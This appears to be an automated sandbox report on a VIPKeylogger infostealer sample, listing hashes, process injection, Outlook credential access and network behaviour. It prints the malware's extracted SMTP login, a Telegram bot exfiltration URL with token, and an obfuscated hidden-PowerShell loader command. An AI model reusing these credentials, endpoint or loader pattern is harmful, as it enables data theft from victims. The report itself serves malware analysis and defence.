Analysis
- max time kernel: 150s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10-01-2025 14:36
Static task: static1
Behavioral tasks:
- behavioral1: sample f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe, resource win7-20240903-en
- behavioral2: sample f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe, resource win10v2004-20241007-en
- behavioral3: sample $PLUGINSDIR/nsExec.dll, resource win7-20240903-en
- behavioral4: sample $PLUGINSDIR/nsExec.dll, resource win10v2004-20241007-en
General
- Target: f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
- Size: 764KB
- MD5: ee18481e218cc9bc7a1628f5a7365776
- SHA1: 57ea302c84a488de1e5a5bcc669e02c5d9a7a350
- SHA256: f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9
- SHA512: a4ae4e6f3d46c05141e1d60b3f92d1b2ad27d758ae27bc063fb3f5fef953237120480e700c5d05d90cc41d92497674c0e7d3e25dbd62e591445170077309f78b
- SSDEEP: 12288:0GCX77iIceZ0Na7lxnjXp54AQ2cPmT3a3ur93tRLPHj6XOahq:qr75cHavj7S1G3aer93tJPDUO/
Malware Config
Extracted
- Protocol: smtp
- Host: mail.abraher.com
- Port: 587
- Username: [email protected]
- Password: General1

Extracted (vipkeylogger)
- Protocol: smtp
- Host: mail.abraher.com
- Port: 587
- Username: [email protected]
- Password: General1
- Email To: [email protected]
- Telegram endpoint: https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendMessage?chat_id=7171338311
Signatures
- VIPKeylogger
  VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
- Vipkeylogger family
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run PowerShell and hide display window.
  pid 2516 powershell.exe
- Loads dropped DLL (1 IoCs)
  pid 2884 f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
- Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  Keys opened by msiexec.exe:
  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Blocklisted process makes network request (10 IoCs)
  pid 5112 msiexec.exe: flows 22, 24, 26, 28, 32, 35, 44, 53, 56, 58
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow 22 drive.google.com; flow 21 drive.google.com
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 34 checkip.dyndns.org; flow 43 reallyfreegeoip.org; flow 44 reallyfreegeoip.org
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  pid 5112 msiexec.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid 2516 powershell.exe; pid 5112 msiexec.exe
- Drops file in Program Files directory (1 IoCs)
  File opened for modification by f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe:
  C:\Program Files (x86)\devotee\Organosol.ini
- Drops file in Windows directory (2 IoCs)
  Files opened for modification by f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe:
  C:\Windows\resources\typhloalbuminuria\rekylgevrs.ini
  C:\Windows\Fonts\ketoside.ref
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by powershell.exe, msiexec.exe and f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid 2516 powershell.exe (7 entries); pid 5112 msiexec.exe (2 entries)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  pid 2516 powershell.exe
- Suspicious use of AdjustPrivilegeToken (23 IoCs)
  pid 2516 powershell.exe, tokens: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 5112 msiexec.exe, tokens: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (7 IoCs)
  PID 2884 (f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe) wrote to memory of PID 2516, procid_target 84 (3 entries)
  PID 2516 (powershell.exe) wrote to memory of PID 5112, procid_target 98 (4 entries)
- outlook_office_path (1 IoCs)
  Key opened by msiexec.exe: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- outlook_win_path (1 IoCs)
  Key opened by msiexec.exe: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes
1. C:\Users\Admin\AppData\Local\Temp\f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe (PID 2884)
   Command line: "C:\Users\Admin\AppData\Local\Temp\f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe"
   - Loads dropped DLL
   - Drops file in Program Files directory
   - Drops file in Windows directory
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2516)
      Command line: powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\Admin\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\msiexec.exe (PID 5112)
         Command line: "C:\Windows\SysWOW64\msiexec.exe"
         - Accesses Microsoft Outlook profiles
         - Blocklisted process makes network request
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - System Location Discovery: System Language Discovery
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - outlook_office_path
         - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads